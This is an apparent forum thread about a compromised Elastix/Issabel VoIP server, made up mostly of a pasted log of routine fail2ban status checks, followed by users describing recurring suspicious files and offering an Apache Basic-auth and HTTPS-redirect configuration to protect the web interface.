                      Jun 9 21:50:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 21:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 22:00:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 22:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 22:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 22:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 22:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 22:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 22:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 22:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 22:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 22:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 22:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 22:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 23:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 23:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 23:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 23:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 23:15:36 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper hdmodelreport
                      Jun 9 23:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 23:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 23:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 23:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 23:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 23:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 23:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 23:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 00:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 00:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 00:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 00:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 00:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 00:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 00:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 00:35:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 00:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 00:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 00:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 00:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 01:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 01:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 01:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 01:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 01:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 01:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 01:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 01:35:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 01:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 01:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 01:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 01:55:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 02:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 02:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 02:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 02:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 02:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 02:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 02:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 02:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 02:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 02:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 02:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 02:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 03:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 03:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 03:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 03:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 03:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 03:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 03:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 03:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 03:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 03:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 03:50:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 03:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 04:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 04:02:01 voicesrv01 runuser: pam_unix(runuser-l:session): session opened for user cyrus by (uid=0)
                      Jun 10 04:02:01 voicesrv01 runuser: pam_unix(runuser-l:session): session closed for user cyrus
                      Jun 10 04:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 04:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 04:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 04:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 04:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 04:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 04:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 04:40:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 04:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 04:50:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 04:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 05:00:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 05:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 05:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 05:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 05:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 05:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 05:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 05:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 05:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 05:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 05:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 05:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 06:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 06:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 06:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 06:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 06:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 06:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 06:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 06:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 06:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 06:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 06:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 06:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 07:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 07:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 07:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 07:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 07:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 07:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 07:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 07:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 07:40:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 07:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 07:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 07:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 08:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 08:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 08:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 08:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 08:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 08:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 08:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 08:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 08:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 08:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 08:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 08:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 09:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 09:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 09:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 09:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 09:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 09:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 09:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 09:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 09:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 09:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 09:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 09:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 10:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 10:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 10:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 10:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 10:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 10:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 10:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 10:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 10:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 10:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 10:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 10:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 11:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 11:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus

                        striderec

                        I did a recursive search for that file and it is only found on /tmp and /var/www/html/_asterisk

                        I delete them over and over but they come back...

                        I see strange POST commands on the access and ssl_access logs which I have already shared with you..

                        Now try to find a script wriyting to those directories

                          hello, sorry for me english,
                          Hello, I usually put on all servers protected by htaccess to at least thus prevent anyone accessing the web part. I copy what they have to do to ask user and password when accessing issabel (or old elastix), I put it in Spanish because I do not know English well, but I hope you understand.

                          Asus clients give them the username and password and with that they can only access via the web those who know

                          I hope it helps
                          hola, yo suelo poner en todos los servidores protegidos por htaccess para al menos asi evitar que acceda cualquiera a la parte web. les copio lo que deben hacer para que pida usuario y clave al acceder a issabel ( o antiguo elastix), lo pongo en español porque en ingles no se bien, pero espero se entienda.

                          Asus clientes les dan el usuario y la clave y con eso solo podran acceder via web quienes lo conozcan

                          Espero que les ayude

                          en el fichero de configuracion en

                          vi /etc/httpd/conf.d/elastix.conf

                          en el fichero elastix.conf

                          hay que poner algo asi

                          Apache-level configuration for Elastix administration interface

                          Timeout 300

                          Default apache configuration specifies greater limits than these

                          #MaxClients 150
                          #MaxRequestsPerChild 1000

                          Default apache User and Group diretives MUST be commented out

                          in order for these to take effect.

                          User asterisk
                          Group asterisk

                          #esto es para preguntar por usuario y clave al entrar por web para mas seguridad

                          <Directory "/var/www/html">

                          Redirect administration interface to https

                          RewriteEngine On
                          RewriteCond %{HTTPS} off
                          RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI}
                          AuthType Basic
                          AuthName "Zona Restringida voip"
                          AuthUserFile /usr/local/apache/wwwpasswd
                          Require user clientes
                          </Directory>

                          luego e guarda y se ejecuta

                          para crear el directorio y usuarios del password solitiado por ejemplo para clientes que es el usuario seria

                          El siguiente paso es generar el password con el comando

                          mkdir /usr/local/apache
                          htpasswd -c /usr/local/apache/wwwpasswd clientes

                          Luego solicitara ingresar un password, finalizados estos pasos es necesario reiniciar apache para que tome los cambios

                          service httpd restart

                          y listo con esto pedira usuario y clave en el puerto 443

                            Hello hgmnetwork,
                            Thanks for the workaround.

                            It is useful for this problem to remove ARI ?

                              Para borrarlo si esta infectado no pero no deberia pasar mas una vez limpiado ya que bloquea el acceso http a peticiones sin clave

                              If your server are exploit not. If you are delete all files affected and put htaccess not exploit more with http access

                              Sorry for me english